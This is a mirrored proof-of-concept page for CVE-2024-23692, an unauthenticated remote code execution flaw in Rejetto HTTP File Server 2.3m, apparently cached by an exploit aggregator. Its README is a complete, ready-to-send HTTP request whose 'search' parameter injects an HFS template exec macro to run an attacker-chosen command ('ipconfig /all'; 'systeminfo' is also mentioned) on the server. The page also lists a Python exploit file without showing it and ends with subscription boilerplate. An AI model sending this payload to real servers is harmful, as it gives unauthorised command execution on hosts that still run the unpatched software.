CVE-2024-23692 PoC — Rejetto HTTP File Server 2.3m Unauthenticated RCE

Source

https://github.com/k3lpi3b4nsh33/CVE-2024-23692

Associated Vulnerability

Title:Rejetto HTTP File Server 2.3m Unauthenticated RCE (CVE-2024-23692)
Description:Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.

Readme

# CVE-2024-23692
BURP POC

```
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1

Host: xxxx

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Cookie: HFS_SID_=0.344328237697482

Upgrade-Insecure-Requests: 1
```

=========================================================

![Snipaste_2024-06-11_15-29-24](https://github.com/k3lpi3b4nsh33/CVE-2024-23692/assets/118002757/4963ae98-224e-463e-a504-812c70a68e53)


COMMAND=systeminfo

You can see that the echo message is around 100 lines of RAW Response

File Snapshot


 [4.0K]  /data/pocs/af20701f2ede0d7ca07441484120c167f6160623
├── [2.9K]  CVE-2024-23692.py
└── [ 817]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!